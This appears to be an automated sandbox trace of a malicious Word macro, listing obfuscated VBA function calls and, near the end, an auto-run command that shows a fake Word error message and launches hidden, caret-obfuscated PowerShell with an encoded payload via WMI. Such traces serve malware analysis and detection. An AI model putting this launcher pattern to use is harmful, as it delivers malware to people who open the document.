                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: UwyYSBsBN

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: tpOgXmm

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: MHYlQAD

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: GznGGHyG

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: bbsIZ

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Mid

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Name

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Application

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: swNGWdd

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: rJEkbLH

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: vEBqHrDnD

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: tWcKo

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: LzxxRHG

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: EKezHIC

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: DpYbmDA

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hDJDJ

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: dXiwA

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hFSyAfFrF

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hXxQDACJA

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: xkQqDXCcD

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Mid

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Len

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: lBenBDA

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: UavHTIBHo

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: IcAHwPH

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: BNmrm

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: FLtYjKHC

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: qAUhkIMz

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Create

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: V2enhc4htwl7z6bh

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Thriap3q9rgf3yy9y

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: zZuzBZGD

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: OIbfvEEFF

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: eLmLDU

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: FYVZFEH

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: hoyzuBGCP

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: Close

                                                    Part of subcall function G8xesq0b8jlsfrsp@Owppnp8hah4xo788: lADFBaJ

                                                    Line  Instruction                  Meta Information
                                                    9     Private Sub Document_open()
                                                    10    G8xesq0b8jlsfrsp             executed
                                                    11    End Sub

                                                    Module: Owppnp8hah4xo788

                                                    Declaration
                                                    Line  Content
                                                    1     Attribute VB_Name = "Owppnp8hah4xo788"

                                                    Executed Functions
                                                    APIs  Meta Information

                                                    Zw1k7hcmdl66

                                                    Item

                                                    Hyii7r76oq89

                                                    diCXTi

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    NZiApKAp

                                                    Close

                                                    vrYYHIDxI

                                                    gzTFLxb

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    PjNhJNA

                                                    Close

                                                    oAaNlB

                                                    sySRJ

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    UwyYSBsBN

                                                    Close

                                                    tpOgXmm

                                                    MHYlQAD

                                                    CreateObject

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    GznGGHyG

                                                    Close

                                                    bbsIZ

                                                    Mid

                                                    Name

                                                    Application

                                                    swNGWdd

                                                    CreateObject

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    rJEkbLH

                                                    Close

                                                    vEBqHrDnD

                                                    tWcKo

                                                    CreateObject

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    LzxxRHG

                                                    Close

                                                    EKezHIC

                                                    DpYbmDA

                                                    CreateObject

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    hDJDJ

                                                    Close

                                                    dXiwA

                                                    CreateObject

                                                    CreateObject("winmgmts:win32_process")

                                                    hFSyAfFrF

                                                    CreateObject

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    hXxQDACJA

                                                    Close

                                                    xkQqDXCcD

                                                    Mid

                                                    Len

                                                    Len("<obfuscated command-line string omitted>") -> 17689

                                                    lBenBDA

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    UavHTIBHo

                                                    Close

                                                    IcAHwPH

                                                    BNmrm

                                                    CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AiRdGDAJ

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: AioOpBFE

                                                    CreateTextFile

                                                    WriteLine

                                                    WriteLine

                                                    WriteLine

                                                    FLtYjKHC

                                                    Close

                                                    qAUhkIMz

                                                    Create

                                                    SWbemObjectEx.Create("cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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,,) -> 0

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: SQQWY

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: ddanFDWJf

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: RhztCF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: kwzjKvZHe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: inIcjJtaF

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: zBSWCKmJv

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: KXTliE

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateTextFile

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: WriteLine

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: YZllAeRe

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: Close

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: hjZwD

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: FUyIHBDFz

                                                    Part of subcall function Jlda77h_v8nx5@Owppnp8hah4xo788: CreateObject

